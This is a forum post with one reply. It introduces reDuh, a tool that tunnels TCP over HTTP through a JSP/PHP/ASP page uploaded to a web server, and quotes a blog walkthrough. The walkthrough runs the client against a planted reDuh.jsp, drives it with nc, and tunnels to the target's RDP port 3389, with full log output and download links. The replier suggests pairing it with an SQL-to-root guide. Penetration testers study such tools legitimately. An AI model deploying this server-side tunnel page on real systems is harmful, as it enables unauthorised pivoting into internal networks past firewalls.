» reDuh - Redirecting TCP over HTTP

[MaXe]

[reDuh was released as part of SensePost's BlackHat USA
2008 talk on tunnelling data in and out of networks.]


Hi there,


Today I read about reDuh and I must say that it looked more interesting now
than it did when I saw it the first time long ago, perhaps because carnal0wnage
wrote about it on his blog with a screenshot of how well it worked out.

What can reDuh do?
reDuh is actually a tool that can be used to create a TCP circuit through validly formed HTTP requests.
Essentially this means that if we can upload a JSP/PHP/ASP page on a server, we can connect to hosts be. [readme]

The following are quotations from carnal0wnage's blog.

Quote:

yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar http://172.16.82.144/CFIDE/reDuh.jsp
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from 172.16.82.144:80/CFIDE/reDuh.jsp. Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010

Once you are connected to the remote end, in another terminal connect to your local reDuh instance.

Quote:

yomama@c0:~$ nc localhost 1010
Welcome to the reDuh command line
>>[usage]
Commands are of the form [command]{options}

Available commands:
[usage] - This menu
[createTunnel]::
[killReDuh] - terminates remote JSP process, and ends this client program
[DEBUG]<0|1|2> - Sets the verbosity
>>[createTunnel]4567:172.16.82.144:3389

Successfully bound locally to port 4567. Awaiting connections.

In your other shell you should see something similar to this:

Quote:

[Info]Caught new service connection on local port 1010
[Info]Successfully bound locally to port 4567. Awaiting connections.

Fire up your terminal server client and point it at localhost:4567

Quote:

[Info]Requesting reDuh to create socket to 172.16.82.144:3389
[Info]Successfully created socket 4567:172.16.82.144:3389:1
[Info]Localhost ====> 172.16.82.144:3389:1 (34 bytes read from local socket)
[Info]Caught data with sequenceNumber 0
[Info]Localhost <==== 172.16.82.144:3389:1 (11 bytes picked up from remote port)
[Info]Localhost ====> 172.16.82.144:3389:1 (386 bytes read from local socket)
[Info]Caught data with sequenceNumber 1

If all is working you'll see a ****load of http traffic and eventually your RDP prompt.

Download Links:
Client: http://www.sensepost.com/research/reDuh/reDuhClient.zip
Server: http://www.sensepost.com/research/re...DuhServers.zip

References:
http://www.sensepost.com/research/reDuh/
http://carnal0wnage.attackresearch.com/node/387

[Norph]

What's that smell? I think it's awesomeness! ;)
This is pretty cool.
I guess it's effective if you mix it up with that from SQL to ROOT or whatever the guide is called ;)

+rep for posting :) (Of course +rep to creator aswell. duh..)